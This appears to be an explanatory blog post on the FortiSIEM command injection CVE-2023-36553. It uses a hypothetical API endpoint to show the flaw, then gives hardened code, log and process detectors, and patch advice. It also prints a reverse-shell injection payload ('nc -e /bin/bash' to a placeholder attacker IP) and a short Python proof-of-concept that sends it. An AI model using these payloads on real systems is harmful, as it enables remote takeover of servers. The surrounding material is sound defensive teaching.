Fortinet FortiSIEM is a recognized name in the network security world, providing organizations with robust tools to gather and analyze security event data. Unfortunately, like many complex systems, it's not immune to vulnerabilities. One such critical vulnerability, tracked as CVE-2023-36553, involves improper neutralization of special elements used in OS commands, commonly known as *OS command injection*. In this post, we’ll break down what this means, how it works, and why you should care.
What is CVE-2023-36553?
CVE-2023-36553 is an *OS command injection* vulnerability present in several versions of Fortinet FortiSIEM. The flaw is due to improper neutralization (sanitization) of special elements in the API handling, which can be manipulated by attackers to execute arbitrary commands on the target system.
How Does the Vulnerability Work?
At its core, this vulnerability exists because FortiSIEM doesn’t properly sanitize input passed in API requests. This means an attacker can inject OS commands in parts of a crafted request—these commands will be executed by the underlying operating system because the application mistakenly trusts user input.
In simple words: A hacker could send a malicious API request and run ANY command on your server.
Exploit Scenario: Step-by-Step
Let’s say there’s an administrative API endpoint that’s vulnerable. Here’s how an attacker could abuse it:
1. Discover the Endpoint: The attacker finds a FortiSIEM instance running a vulnerable version and identifies (possibly through scanning or documentation) an API endpoint that takes user input and processes it in an unsafe way.
2. Craft the Payload: The attacker creates a malicious payload containing OS command code.
3. Send the Request: The attacker sends an HTTP POST/GET request to the vulnerable endpoint, stuffing their payload in a parameter.
4. Execution: The backend script naively passes user input to a system command without sanitizing it. The payload is executed as a real command, giving the attacker control.
Let’s see how such an attack could look.
Suppose the application has an endpoint like /api/device/add that takes a hostname parameter, and the backend runs a command like:

```python
os.system(f"ping -c 1 {hostname}")
```
A benign request:

```json
{
"hostname": "example.com"
}
```
A malicious request might look like:

```json
{
"hostname": "example.com; nc -e /bin/bash attacker_ip 4444"
}
```
This would result in the backend running this command:

```sh
ping -c 1 example.com; nc -e /bin/bash attacker_ip 4444
```
The part after the semicolon (nc -e /bin/bash attacker_ip 4444) opens a reverse shell from your FortiSIEM box to the attacker, giving them direct command-line access.
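To make the contrast concrete, here is an added example (not code from this post or from FortiSIEM) that puts the vulnerable pattern above next to a hardened version: the hostname is checked against a strict allowlist, and the command is handed to subprocess as an argument list with shell=False, so no shell ever interprets the value. The vulnerable function only builds the string the shell would receive; it does not execute anything. The function names and the hostname regex are my own.

```python
import re
import subprocess

# Allowlist for a hostname: dot-separated RFC 1123 labels of letters, digits and
# hyphens, no label starting or ending with '-', whole value at most 253 chars.
# Rejecting a leading '-' also stops the value from being parsed as a ping option.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def build_command_vulnerable(hostname: str) -> str:
    """Reproduce the os.system(f"ping -c 1 {hostname}") pattern without executing
    it: return the exact string the shell would receive. Everything after a ';'
    in 'hostname' is parsed by the shell as a second command."""
    return f"ping -c 1 {hostname}"


def is_valid_hostname(hostname: str) -> bool:
    return HOSTNAME_RE.match(hostname) is not None


def build_command_safe(hostname: str) -> list[str]:
    """Hardened form: validate against the allowlist, then return an argv list.
    Passed to subprocess with shell=False, the hostname reaches ping as one
    literal argument; no shell ever sees it, so ';', '|' and '$(...)' are inert."""
    if not is_valid_hostname(hostname):
        raise ValueError(f"rejected hostname: {hostname!r}")
    return ["ping", "-c", "1", hostname]


def run_ping_safe(hostname: str) -> int:
    """Execute the hardened command and return ping's exit status."""
    completed = subprocess.run(
        build_command_safe(hostname), shell=False, capture_output=True, timeout=10
    )
    return completed.returncode


if __name__ == "__main__":
    # Constructed inputs: the benign value and the injection payload from the post.
    for value in ("example.com", "example.com; nc -e /bin/bash attacker_ip 4444"):
        print("shell string :", build_command_vulnerable(value))
        try:
            print("argv (safe)  :", build_command_safe(value))
        except ValueError as exc:
            print("argv (safe)  :", exc)
```

The argv list on its own already removes the shell from the picture, which is what stops the `;` trick. The allowlist is defence in depth: it also blocks values beginning with `-`, which a shell-free call would otherwise pass to ping as an option, and it gives the API a clear place to reject and log malformed input.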
> WARNING: Never try this on any system you don't own or have explicit permission to test. Exploiting such vulnerabilities on live systems is a crime.
Here’s a minimal proof-of-concept for educational purposes (*don’t use maliciously!*):

```python
import requests

# Replace with your FortiSIEM instance's URL and attacker IP
url = "https://victim-fortisiem/api/device/add"
headers = {'Content-Type': 'application/json'}
payload = {
    "hostname": "example.com; nc -e /bin/bash 10...1 4444"
}
response = requests.post(url, json=payload, headers=headers, verify=False)
print(response.text)
```
This code tries to trigger the vulnerability by sending a crafted payload that would instruct the server to open a reverse shell to your attacker box.
- Check your FortiSIEM version: Go to the admin dashboard or run version check commands.
- Look for unexplained activity/logs: Unexpected connections, unknown users, or strange processes.
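As an added example for the second checklist item (not from this post, and not FortiSIEM's real log or process formats), here are two small hunt functions run over constructed sample data. One scans API request-log lines for parameter values carrying shell metacharacters, the trace an injection attempt leaves behind; the other walks a process listing and reports any descendant of the API service that is not an expected child. The log layout, the /opt/app/api-server path and the svc_api account are placeholders I chose for the example.

```python
import json
import os
import re

# Shell metacharacters that never belong in a scalar parameter such as a hostname.
SHELL_META_RE = re.compile(r"[;&|`$<>\n\r]")

# Constructed, generic request-log layout used only for this example
# (not FortiSIEM's real log format):
#   <timestamp> <client-ip> <METHOD> <path> <JSON body>
REQUEST_LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<body>\{.*\})$"
)

# Constructed sample API request log (RFC 5737 documentation addresses).
SAMPLE_REQUEST_LOG = [
    '2023-11-15T10:00:01Z 192.0.2.10 POST /api/device/add {"hostname": "example.com"}',
    '2023-11-15T10:00:07Z 198.51.100.23 POST /api/device/add '
    '{"hostname": "example.com; nc -e /bin/bash 198.51.100.23 4444"}',
    '2023-11-15T10:00:09Z 192.0.2.11 GET /api/device/list {}',
    '2023-11-15T10:00:12Z 198.51.100.23 POST /api/device/add {"hostname": "$(id)"}',
]

# Constructed sample process listing, one process per line: PID PPID USER COMMAND.
# '/opt/app/api-server' and 'svc_api' are placeholders, not FortiSIEM names.
SAMPLE_PROCESS_LIST = [
    "1201 1 root /usr/sbin/sshd -D",
    "2300 1 svc_api /opt/app/api-server",
    "2417 2300 svc_api ping -c 1 example.com",
    "2418 2300 svc_api nc -e /bin/bash 198.51.100.23 4444",
    "2419 2418 svc_api /bin/bash",
]


def flag_suspicious_requests(lines):
    """Return request-log entries whose JSON body holds a string value containing
    shell metacharacters."""
    hits = []
    for line in lines:
        m = REQUEST_LINE_RE.match(line)
        if not m:
            continue
        try:
            body = json.loads(m.group("body"))
        except json.JSONDecodeError:
            continue
        for key, value in body.items():
            if isinstance(value, str) and SHELL_META_RE.search(value):
                hits.append({"ts": m.group("ts"), "client": m.group("client"),
                             "path": m.group("path"), "param": key, "value": value})
    return hits


def flag_unexpected_children(ps_lines, service_cmd, allowed_children):
    """Return descendants of the service process whose executable is not in the
    expected-children allowlist. A shell or netcat hanging off the API worker is
    exactly the 'strange process' the checklist means."""
    procs = {}
    for line in ps_lines:
        pid, ppid, user, cmd = line.split(None, 3)
        procs[int(pid)] = {"pid": int(pid), "ppid": int(ppid), "user": user, "cmd": cmd}
    service_pids = {p["pid"] for p in procs.values() if p["cmd"].startswith(service_cmd)}

    def descends_from_service(pid):
        seen = set()
        while pid in procs and pid not in seen:
            seen.add(pid)
            pid = procs[pid]["ppid"]
            if pid in service_pids:
                return True
        return False

    flagged = []
    for p in procs.values():
        exe = os.path.basename(p["cmd"].split()[0])
        if descends_from_service(p["pid"]) and exe not in allowed_children:
            flagged.append(p)
    return flagged


if __name__ == "__main__":
    for hit in flag_suspicious_requests(SAMPLE_REQUEST_LOG):
        print("suspicious request:", hit)
    for proc in flag_unexpected_children(SAMPLE_PROCESS_LIST, "/opt/app/api-server", {"ping"}):
        print("unexpected child of API server:", proc)
```

Both checks are baseline-driven: the request scan asks "does this parameter contain characters a hostname never needs", and the process scan asks "is this something the API service is known to spawn". Tune the allowlist of expected children to what your deployment actually runs before alerting on it.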
How to Fix It
Fortinet has released patches and updates addressing this vulnerability. Update immediately if you are running any of the vulnerable versions.
- Fortinet Security Advisory
More Information
- NVD: CVE-2023-36553
- MITRE CVE Details
- Fortinet PSIRT
Conclusion
CVE-2023-36553 is a critical issue: it lets attackers run any commands they want on your FortiSIEM box via a simple API request if you’re not patched. If you’re running a vulnerable version, update right now and check your log files for signs of compromise.
Stay safe out there, and patch your systems!
*© 2024 – Original writeup for educational awareness. Always practice responsible disclosure and patch management.*
Timeline
Published on: 11/14/2023 18:15:48 UTC
Last modified on: 11/20/2023 20:06:00 UTC